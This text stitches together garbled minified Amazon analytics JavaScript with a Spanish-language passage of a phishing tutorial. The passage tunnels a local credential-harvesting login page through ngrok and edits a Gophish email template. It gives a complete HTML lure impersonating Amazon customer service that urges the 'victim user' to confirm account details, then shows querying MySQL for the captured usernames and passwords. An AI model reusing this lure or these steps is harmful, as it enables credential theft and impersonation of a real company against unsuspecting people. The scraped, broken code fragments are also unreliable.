_.unshift(X(2, t, e))
}, w[2] = function(r, c) {
a in r && f in r && O.forEach(function(t) {
for (var e = t.selector, n = r[f](e), i = r[a](e), o = i.length - 1; 0 <= o; o--) _.unshift(X(3, {
e: i[o],
s: t
}, c));
n && _.unshift(X(3, {
e: r,
s: t
}, c))
}, w[3] = function(t, e) {
var n = t.e;
K(n) || Y("csa", n, t.s.entity, e)
}, w[4] = function() {
u.register(t, {
instance: D
}, new k[e](function(t) {
T(t, u.time(), 1)
}).observe(U, {
childList: !0,
subtree: !0
}), T(U, u.time(), 2), T(null, u.time(), 4), u.on("$content.export", function(e) {
Object.keys(e).forEach(function(t) {
x[t] = e[t]
csa.plugin(function(o) {
var i, t = "ContentImpressions",
e = "KillSwitch.",
n = "IntersectionObserver",
r = "getAttribute",
s = "dataset",
c = "intersectionRatio",
a = "csaCId",
m = 1e3,
l =,
f = o.config,
u = f[e + t],
v = f[e + t + ".ContentViews"],
g = ((l.performance || {}).timing || {}).navigationStart || o.time(),
d = {};
function h(t) {
t && (t.v = 1, function(t) {
t.vt = o.time(), t.el.log({
schemaId: "<ns>.ContentView.4",
timeToViewed: t.vt - t.el.rt,
pageFirstPaintToElementViewed: t.vt - g
function I(t) {
t && ! && (t.i = o.time() - > m, function(t) { = o.time(), t.el.log({
schemaId: "<ns>.ContentImpressed.3",
timeToImpressed: - t.el.rt,
pageFirstPaintToElementImpressed: - g
}!u && l[n] && (i = new l[n](function(t) {
var n = o.time();
t.forEach(function(t) {
var e = function(t) {
if (t && t[r]) return d[t[s][a]]
if (e) {
o.emit("$content.intersection", {
meta: e.el,
t: n,
e: t
var i = t.intersectionRect;
t.isIntersecting && 0 < i.width && 0 < i.height && (v || e.v || h(e), .5 <= t[c] && ! && ( = n, e.timer = o.timeout(function() {
}, m))), t[c] < .5 && ! && e.timer && (l.clearTimeout(e.timer), = 0, e.timer = 0)
}, {
threshold: [0, .5, .99]
}), o.on("$content.register", function(t) {
var e = t.el;
e && (d[] = {
el: t,
v: 0,
i: 0,
is: 0,
vt: 0,
it: 0
}, i.observe(e))
csa.plugin(function(e) {
e.config["KillSwitch.ContentLatency"] || e.emit("$content.export", {
mark: function(t, n) {
var o = this;
o.t || (o.t = e("Timers", {
logger: o.l,
schemaId: "<ns>.ContentLatency.4",
logOptions: o.dlo
})), o.t("mark", t, n)
csa.plugin(function(t) {
function n(i, e, o) {
var c = {};
function r(t, n, e) {
t in c && o <= n - c[t].s && (function(n, e, i) {
if (!p) return;
E(function(t) {
T(n, t), t.w[n][e] = a((t.w[n][e] || 0) + i)
}(t, i, n - c[t].d), c[t].d = n), e || delete c[t]
this.update = function(t, n) {
n.isIntersecting && e <= n.intersectionRatio ? function(t, n) {
t in c || (c[t] = {
s: n,
d: n
}(t, u()) : r(t, u())
}, this.stopAll = function(t) {
var n = u();
for (var e in c) r(e, n, t)
}, this.reset = function() {
var t = u();
for (var n in c) c[n].s = t, c[n].d = t
var e = t.config,
u = t.time,
i = "ContentInteractionsSummary",
o = e[i + ".FlushInterval"] || 5e3,
c = e[i + ".FlushBackoff"] || 1.5,
r =,
s = t.on,
a = Math.floor,
f = (r.document || {}).documentElement || {},
l = ((r.performance || {}).timing || {}).responseStart || t.time(),
d = o,
m = 0,
p = !0,
v = t.UUID(),
g = t("Events", {
producerId: "csa",
lob: e.lob || "0"
w = new n("it0", 0, 0),
I = new n("it50", .5, 1e3),
h = new n("it100", .99, 0),
b = {},
A = {};
function $() {
w.stopAll(!0), I.stopAll(!0), h.stopAll(!0), S()
function C() {
w.reset(), I.reset(), h.reset(), S()
function S() {
d && (clearTimeout(m), m = t.timeout($, d), d *= c)
function U(n) {
E(function(t) {
T(n, t), t.w[n].mc = (t.w[n].mc || 0) + 1
function E(t) {
g("log", {
messageId: v,
schemaId: "<ns>.ContentInteractionsSummary.2",
w: {},
__merge: t
}, {
ent: {
page: ["requestId"]
function T(t, n) {
t in n.w || (n.w[t] = {})
e["KillSwitch." + i] || (s("$content.intersection", function(t) {
if (t && t.meta && t.e) {
var n =;
if (n in b) {
var e = t.e.boundingClientRect || {};
e.width < 5 || e.height < 5 || (w.update(n, t.e), I.update(n, t.e), h.update(n, t.e), !t.e.isIntersecting || n in A || (A[n] = 1, function(n, e) {
E(function(t) {
T(n, t), t.w[n].ttfv = a(e)
}(n, u() - l)))
}), s("$content.register", function(t) {
(t.e || {}).slotId && (b[] = {}, function(e) {
E(function(t) {
var n =;
T(n, t), t.w[n].sid = (e.e || {}).slotId, t.w[n].cid = (e.e || {}).contentId
}), s("$beforePageTransition", function() {
$(), C(), v = t.UUID(), S()
}), s("$beforeunload", function() {
w.stopAll(), I.stopAll(), h.stopAll(), d = null
}), s("$visible", function(t) {
t ? C() : ($(), clearTimeout(m)), p = t
}, {
buffered: 1
}), s(f, "click", function(t) {
for (var n =, e = 25; n && 0 < e;) {
var i = (n.dataset || {}).csaCId;
i && U(i), n = n.parentElement, e -= 1
}, {
capture: !0,
passive: !0
}), S())
csa.plugin(function(d) {
var t, o, e = "normal",
c = "reload",
i = "history",
s = "new-tab",
n = "ajax",
r = 1,
a = 2,
u = "lastActive",
l = "lastInteraction",
p = "used",
f = "csa-tabbed-browsing",
y = "visibilityState",
g = "page",
v = "experience",
b = "request",
m = {
"back-memory-cache": 1,
"tab-switch": 1,
"history-navigation-page-cache": 1
I = "<ns>.TabbedBrowsing.4",
T = "visible",
h =,
x = d("Events", {
producerId: "csa",
lob: d.config.lob || "0"
w = h.location || {},
S = h.document,
q = h.JSON,
P = ((h.performance || {}).navigation || {}).type,
z =,
E = d.on,
$ = d.storageSupport(),
k = !1,
A = {},
C = {},
O = {},
j = {},
B = {},
J = !1,
N = !1,
R = !1,
D = 0;
function F(e) {
try {
return q.parse(z(f, void 0, {
session: e
}) || "{}") || {}
} catch (e) {
d.error('Could not parse storage value for key "' + f + '": ' + e)
return {}
function G(e, i) {
z(f, q.stringify(i || {}), {
session: e
function H(e) {
var i = C.tid ||,
t = A[u] || {};
t.tid === i && ( =, t.ent = B), j = {
tid: i,
ent: B,
lastInteraction: C[l] || {},
initialized: !0
}, O = {
lastActive: t,
lastInteraction: A[l] || {},
time: d.time()
function K(e) {
var i = e === s,
t = S.referrer,
n = !(t && t.length) || !~t.indexOf(w.origin || ""),
r = i && n,
a = {
type: e,
toTabId: j.tid,
transitTime: d.time() - A.time || null
r || function(e, i, t) {
var n = e === c,
r = i ? A[u] || {} : C,
a = A[l] || {},
d = C[l] || {},
o = i ? a : d;
t.fromTabId = r.tid, t.fromPageId =;
var s = r.ent || {};
s.rid && (t.fromRequestId = s.rid || null), s.ety && (t.fromExperienceType = s.ety || null), s.esty && (t.fromExperienceSubType = s.esty || null), n || ! || o[p] || (t.interactionId = || null, o.sid && (t.interactionSlotId = o.sid || null), === && (a[p] = !0), === && (d[p] = !0))
}(e, i, a), x("log", {
navigation: a,
schemaId: I
}, {
ent: {
page: ["pageType", "subPageType", "requestId"]
function L(e) {
R = function(e) {
return e && e in m
function() {
A = F(!1), C = F(!0);
var e = A[l],
i = C[l],
t = !1,
n = !1;
e && i && === && e[p] !== i[p] && (t = !e[p], n = !i[p], i[p] = e[p] = !0, t && G(!1, A), n && G(!0, C))
}(), H(e), J = !0,
function(e) {
var i, t;
i = Q(), t = U(), (i || t) && H(e)
}(e), D = 1
function M() {
k && !R ? K(n) : (k = !0, K(P === a || R ? i : P === r ? C.initialized ? c : s : C.initialized ? e : s))
function Q() {
var e = t,
i = {};
return !!(J && e && e.e && e.w) && (e.w("entities", function(e) {
i = e || {}
}), C[l] = {
id: e.e.messageId,
sid: i.slotId,
used: !(A[l] = {
id: e.e.messageId,
sid: i.slotId,
used: !1
}, !(t = null))
function U() {
var e = !1;
if (N = S[y] === T, J) {
var i = A[u] || {};
e = function(e, i, t, n) {
var r = !1,
a = e[u];
return N ? a && a.tid === j.tid && a[T] && === t || (e[u] = {
visible: !0,
pid: t,
tid: i,
ent: n
}, r = !0) : a && a.tid === j.tid && a[T] && (r = !(a[T] = !1)), r
}(A, C.tid || i.tid || j.tid, || ||, C.ent || i.ent || j.ent)
return e
$.local && $.session && q && S && y in S && (o = function() {
try {
return h.self !==
} catch (e) {
return !0
}(), E("$entities.set", function(e) {
if (!o && e) {
var i = (e[b] || {}).id || (e[g] || {}).requestId,
t = (e[v] || {}).experienceType || (e[g] || {}).pageType,
n = (e[v] || {}).experienceSubType || (e[g] || {}).subPageType,
r = !B.rid && i || !B.ety && t || !B.esty && n;
if (B.rid = B.rid || i, B.ety = B.ety || t, B.esty = B.esty || n, r && D) {
var a = A[u] || {};
a.tid === C.tid && (a.ent = B, G(!1, A)), C.ent = B, G(!0, C)
}, {
buffered: 1
}), E("$pageChange", function(e) {
o || (L(e), M(), G(!1, O), G(!0, j), C = j, A = O)
}, {
buffered: 1
}), E("$content.interaction", function(e) {
t = e, Q() && (G(!1, A), G(!0, C))
}), E(S, "visibilitychange", function() {
!o && U() && G(!1, A)
}, {
capture: !1,
passive: !0
csa.plugin(function(c) {
var e = c("Metrics", {
producerId: "csa"
c.on(, "pageshow", function(c) {
c && c.persisted && e("recordMetric", "bfCache", 1)
csa.plugin(function(n) {
var e, t, i, o, r, a, c, u, f, s, l, d, m, p, g, v, h = "hasFocus",
b = "$app.",
y = "avail",
S = "client",
T = "document",
$ = "inner",
I = "offset",
P = "screen",
w = "scroll",
D = "Width",
E = "Height",
F = y + D,
O = y + E,
q = S + D,
x = S + E,
z = $ + D,
C = $ + E,
H = I + D,
K = I + E,
M = w + D,
W = w + E,
X = n.config,
Y = X["KillSwitch.PageInteractionsSummary"],
j = n("Events", {
producerId: "csa",
lob: X.lob || "0"
k = 1,
A = || {},
B = n.time,
G = n.on,
J = n.once,
L = A[T] || {},
N = A[P] || {},
Q = A.Math || {},
R = Q.abs,
U = Q.max,
V = Q.ceil,
Z = ((A.performance || {}).timing || {}).responseStart,
_ = function() {
return L[h]()
nn = 1,
en = 100,
tn = {},
on = 1;
function rn() {
c = t = o = r = e, i = 0, a = u = f = s = 0, un(), cn()
function an() {
Z && !o && (c = V((o = l) - Z), on = 1)
function cn() {
u = V(U(u, m + v)), d && (f = V(U(f, d + g))), on = 1
function un() {
l = B(), d = R(A.pageXOffset || 0), m = R(A.pageYOffset || 0), p = 0 < d || 0 < m, g = A[z] || 0, v = A[C] || 0
function fn() {
un(), an(),
function() {
var n = m - i;
t && !(t && t <= l) || (n && (++a, on = 1), i = m, n), t = l + en
}(), cn()
function sn() {
if (r) {
var n = V(B() - r);
s += n, r = e, on = 0 < n
function ln() {
r = r || B()
function dn(n, e, t, i) {
e[n + D] = V(t || 0), e[n + E] = V(i || 0)
function mn(n) {
var e = n === tn,
t = _();
if (t || on) {
if (!e) {
if (!k) return;
k = 0, t && sn()
var i = function() {
var n = {},
e = L.documentElement || {},
t = L.body || {};
return dn("availableScreen", n, N[F], N[O]), dn(T, n, U(t[M] || 0, t[H] || 0, e[q] || 0, e[M] || 0, e[H] || 0), U(t[W] || 0, t[K] || 0, e[x] || 0, e[W] || 0, e[K] || 0)), dn(P, n, N.width, N.height), dn("viewport", n, A[z], A[C]), n
o = function() {
var n = {
scrollCounts: a,
reachedDepth: u,
horizontalScrollDistance: f,
dwellTime: s
return "number" == typeof c && (n.clientTimeToFirstScroll = c), n
e ? on = 0 : (rn(), Z = B(), t && (r = Z)), j("log", {
activity: o,
dimensions: i,
schemaId: "<ns>.PageInteractionsSummary.2"
}, {
ent: {
page: ["pageType", "subPageType", "requestId"]
function pn() {
sn(), mn(tn)
function gn(n, e) {
return function() {
nn = e, n()
function vn() {
_ = function() {
return nn
}, nn && !r && (r = B())
"function" != typeof L[h] || Y || (rn(), p && an(), G(A, w, fn, {
passive: !0
}), G(A, "blur", pn), G(A, "focus", gn(ln, 1)), J(b + "android", vn), J(b + "ios", vn), G(b + "pause", gn(pn, 0)), G(b + "resume", gn(ln, 1)), G(b + "resign", gn(pn, 0)), G(b + "active", gn(ln, 1)), _() && (r = Z || B()), J("$beforeunload", mn), G("$beforeunload", mn), G("$document.hidden", pn), G("$beforePageTransition", mn), G("$afterPageTransition", function() {
on = k = 1
csa.plugin(function(e) {
var o, n, r = "<ns>.Navigator.5",
a =,
i = a.navigator || {},
d = i.connection || {},
c = a.Math.round,
t = e("Events", {
producerId: "csa",
lob: e.config.lob || "0"
function l() {
o = {
network: {
downlink: void 0,
downlinkMax: void 0,
rtt: void 0,
type: void 0,
effectiveType: void 0,
saveData: void 0
language: void 0,
doNotTrack: void 0,
hardwareConcurrency: void 0,
deviceMemory: void 0,
cookieEnabled: void 0,
webdriver: void 0
}, v(), o.language = i.language || null, o.doNotTrack = function() {
switch (i.doNotTrack) {
case "1":
return "enabled";
case "0":
return "disabled";
case "unspecified":
return i.doNotTrack;
return null
}(), o.hardwareConcurrency = "hardwareConcurrency" in i ? c(i.hardwareConcurrency || 0) : null, o.deviceMemory = "deviceMemory" in i ? c(i.deviceMemory || 0) : null, o.cookieEnabled = "cookieEnabled" in i ? i.cookieEnabled : null, o.webdriver = "webdriver" in i ? i.webdriver : null
function u() {
t("log", {
network: (n = {}, Object.keys( {
n[e] =[e] + ""
}), n),
language: o.language,
doNotTrack: o.doNotTrack,
hardwareConcurrency: o.hardwareConcurrency,
deviceMemory: o.deviceMemory,
cookieEnabled: o.cookieEnabled,
webdriver: o.webdriver,
schemaId: r
}, {
ent: {
page: ["pageType", "subPageType", "requestId"]
function v() {
! function(n) {
Object.keys( {[e] = n[e]
downlink: "downlink" in d ? c(d.downlink || 0) : null,
downlinkMax: "downlinkMax" in d ? c(d.downlinkMax || 0) : null,
rtt: "rtt" in d ? (d.rtt || 0).toFixed() : null,
type: d.type || null,
effectiveType: d.effectiveType || null,
saveData: "saveData" in d ? d.saveData : null
function k() {
v(), u()
function w() {
l(), u()
l(), u(), e.on("$afterPageTransition", w), e.on(d, "change", k)
ue.exec(function(d, c) {
function g(e, c) {
e && ue.tag(e + c);
return !!e
function n() {
for (var e = RegExp("^https://(.*\.(images|ssl-images|media)-amazon\.com|" + c.location.hostname + ")/images/", "i"), d = {}, h = 0, k = c.performance.getEntriesByType("resource"), l = !1, b, a, m, f = 0; f < k.length; f++)
if (a = k[f], 0 < a.transferSize && a.transferSize >= a.encodedBodySize && (b = e.exec(String( && 3 === b.length) {
a: {
b = a.serverTiming || [];
for (a = 0; a < b.length; a++)
if ("provider" === b[a].name) {
b = b[a].description;
break a
} b = void 0
b && (l || (l = g(b, "_cdn_fr")),
a = d[b] = (d[b] || 0) + 1, a > h && (m = b, h = a))
} g(m, "_cdn_mp")
d.ue && "function" === typeof d.ue.tag && c.performance && c.location && n()
}, "cdnTagging")(ue_csm, window);
/* ◬ */
<img height="1" width="1" style='display:none;visibility:hidden;' src='//$uedata=s:%2Fap%2Fuedata%3Fnoscript%26id%3DKE82YVBED2PEDHPE6KTZ:0' alt="" />
window.ue && ue.count && ue.count('CSMLibrarySize', 48875)
Una vez estemos aqui ya se habrian escrito las credenciales en la base de datos, pero cuando le den a Iniciar sesión
les llevara al verdadero login de la pagina oficial...
Pero esto estara en local por lo que solo nosotros podremos verlo, para ponerlo de forma publica tunelizando nuestro servidor local de apache2
a un dominio publico por asi decirlo lo haremos con la herramienta ngrok
ngrok [Configuracion]
Primero lo descargaremos, seleccionaremos el S.O. acorde a donde se este configurando con la arquitectura correspondiente...
En la misma pagina crearemos una cuenta para tener una API Key
, una vez creada la cuenta y descargado el archivo, descomprimiremos el archivo en la terminal...
tar -xvzf <FILE>.tgz
Esto nos dara el archivo ngrok
sera el ejecutable que tunelizara el localhost:7755
) en el respectivo puerto que lo configuramos de la siguiente manera con nuestra API Key
URL (API Key) =
Aqui podremos ver nuestra API
para poder hacer lo siguiente...
./ngrok authtoken <API Key>
./ngrok http 7755
Esto iniciara la tunelizacion del localhost
proporcionando asi la URL
a la que nos tenemos que conectar para poder visualizar que todo esta funcionando correctamente y la que tendremos que meter en el codigo del email
de la herramienta Gophish
En mi caso me proporciono
pero por seguridad y que no les aparezca al usuario la interfaz de ngrok
detallaremos dode quieres que se redirija al usuario de que archivo de la pagina, quedando de la siguiente forma...
Asi nos aseguramos que se muestre el index.php
y esa URL
es un ejemplo de lo que me salio a mi, pero puede ser distinta...
Una vez que tengamos la URL
lo cambiaremos en Gophish
en la seccion de Tempalte Email
donde pone {{.URL}}
lo sustituiremos por
por lo que cuando den a un link les llevara al de nuestro localhost
tunelizado por ngrok
quedando de la siguiente manera...
<style type="text/css">.input_letter {
font-size: 17px;
font-weight: bold;
.line {
color: grey;
height: 0.1px;
.line_head {
color: orange;
height: 10px;
background-color: orange;
border: none;
margin-top: 0px;
.box {
background-color: rgba(220, 220, 220,0.45);
border-radius: 3px;
padding: 10px;
font-size: 12.5px;
color: rgb(130, 130, 130);
span.letter {
font-family: Verdana, Geneva, Thaoma, sans-serif;
body {
font-family: Verdana, Geneva, Thaoma, sans-serif;
color: black;
<hr class="line_head" />
<p><img src="" width="300" /></p>
<hr class="line" />
<p>Estimado/a cliente,<br />
<br />
Lamentamos informarle que ha habido un problema con uno de sus pedidos recientes en Amazon. Para resolver este problema y asegurarnos de que reciba su pedido a tiempo, necesitamos que confirme algunos detalles de su cuenta.<br />
<br />
Si no resuelve este problema, es posible que su pedido se retrase o sea cancelado. Agradecemos su pronta atención a este asunto.<br />
<br />
Si tiene alguna pregunta o necesita asistencia adiccional, no dude en contactarnos a traves de nuestro servicio de atención al cliente.<br />
<br />
Atentamente,<br />
<br />
Equipo de Atención al Cliente Amazon.</p>
<p><a href=""><input class="input_letter" style="background-color: orange; border: none; border-radius: 3px; padding: 15px 32px;" type="submit" value="Seguimiento de tu pedido" /></a></p>
<div class="box"><span class="letter">Si en el futuro prefieres no recibir correos electrónicos de Amazon de este tipo, selecciona la exlución voluntaria <a href="">aquí</a></span><br />
<br />
<span class="letter">Referencia AKDFGD27DKIEHFU6-JDLJDJS423ILFPBNGS Amazon EU Sarl. Luxemburgo, Reg# B-1810102, 5 Rue Plaetis, L-23824 Luxemburgo. VAT # LU 2026781.</span><br />
<p><img src="" width="100" /></p>
Lo guardamos y ya podremos enviarlo al usuario victima de la siguiente manera...
Volvemos por donde lo dejamos en la herramienta Gophish
en la zona de Campaigns
dejando la configuracion que mencione anteriormente y estando en la parte de Send Email
pondremos el email
del usuario victima y le daremos al boton de Send
una vez hecho esto, ya le habria llegado al usuario y solo seria cuestion de esperar...
Si el usuario hubiera picado y hubiera introducido las credenciales en la pagina del login phishing
lo veremos de la siguiente manera llendo a mysql
y haciendo lo siguiente...
mysql -h localhost -u root -proot
USE phishing_db;
SELECT * FROM credentials;
| id | username | password |
| 1 | admin | root |
1 row in set (0.020 sec)
Y como veremos las credenciales fueron registradas perfectamente...
Last updated